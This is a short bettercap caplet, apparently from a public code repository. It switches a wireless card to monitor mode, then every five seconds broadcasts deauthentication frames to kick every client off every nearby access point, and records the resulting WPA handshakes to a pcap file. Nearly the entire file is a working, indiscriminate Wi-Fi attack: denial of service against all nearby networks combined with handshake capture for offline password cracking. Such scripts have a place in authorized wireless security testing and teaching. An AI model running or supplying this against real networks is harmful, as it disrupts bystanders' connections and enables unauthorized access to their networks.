33 lines
900 B
Plaintext
33 lines
900 B
Plaintext
# More info about this caplet: https://twitter.com/evilsocket/status/1021367629901115392
|
|
|
|
set $ {bold}😈 » {reset}
|
|
|
|
# make sure wlan0 is in monitor mode
|
|
# ref: https://github.com/offensive-security/kali-arm-build-scripts/blob/master/rpi3-nexmon.sh
|
|
!monstop
|
|
!monstart
|
|
|
|
# every 5 seconds:
|
|
# - clear the screen
|
|
# - show the list of nearby access points
|
|
# - deauth every client from each one of them
|
|
set ticker.period 5
|
|
set ticker.commands clear; wifi.show; wifi.deauth ff:ff:ff:ff:ff:ff
|
|
# sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
|
|
set net.sniff.verbose true
|
|
set net.sniff.filter ether proto 0x888e
|
|
set net.sniff.output wpa.pcap
|
|
|
|
# uncomment to only hop on these channels:
|
|
# wifi.recon.channel 1,2,3
|
|
wifi.recon on
|
|
ticker on
|
|
net.sniff on
|
|
|
|
# we'll see lots of probes after each deauth, just skip the noise ...
|
|
events.ignore wifi.client.probe
|
|
# start fresh
|
|
events.clear
|
|
clear
|
|
|